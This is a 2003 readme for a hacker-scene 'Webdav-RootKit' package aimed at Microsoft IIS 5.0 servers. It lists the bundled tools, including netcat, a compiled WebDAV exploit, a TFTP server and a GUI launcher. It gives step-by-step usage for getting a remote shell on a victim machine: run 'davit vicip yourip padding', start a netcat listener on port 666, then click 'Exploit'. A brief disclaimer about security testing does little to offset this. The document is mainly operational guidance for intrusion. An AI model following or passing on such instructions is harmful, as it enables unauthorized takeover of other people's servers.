Webdav-RootKit for IIS 5.0 ( webdavin' 1.01 )
concept and ideas - morning_wood
Morning Wood Inc
http://exploit.mine.nu - http://illmob.org
04/04/2003


	WARNING !!! THIS CAN OBTAIN ROOT ACCESS REMOTLY TO A RUNNING IIS 5.0
          SYSTEM. IT'S USE IS INTENDED TO BE USED AS A SECURITY CHECKING
	AND VUNERABLITY TESTING TOOL ONLY. THE AUTHOR MAKE NO WARANTIES AND
        IS NOT RESPONSIBLE FORR IT'S USE. 	


  This is the readme for Wood's Webdav-Rootkit


I have included 2 versions.
 This will not be a tutorial on how to root via webdav.
It is every thing you need in a convinent package and it's basic use.



basic ez-webdavin'

Files used:

davit.bat
cat.bat
nc.exe - netcat
webdav.exe - webdav compiled from the original sources by morning_wood

usage is:

 davit vicip yourip padding


 This should spawn a netcat  window listening on port 666
and start the webdav exploit on the remote box.
beta 1 of this routine, it blows ass


Webdav'n - Root - Full

Files Used:

cat.bat - starts nc.exe easy
nc.exe - duh
tftpd32.exe - thpd server ( port 63 )
webdav-gui.exe - coded by krator http://www.coromputer.net

usage is:

Start tftpd with your choice of file in the root.
Start cat.bat or netcat with the proper parameters.
Start webdav-gui.exe , enter parameters matching your netcat settings.
Click "Exploit" .. wait forr remote shell in your nc box.
Give ownange


More info contact:

morning_wood
se_cur_ity@hotmail.com
http://exploit.mine.nu  - http://illmob.org

GreetZ:

BMC - illwill - Merl - Macker 

featured site:
http://areyoufearless.com ( glad yer back )






morning_wood 04/03/2003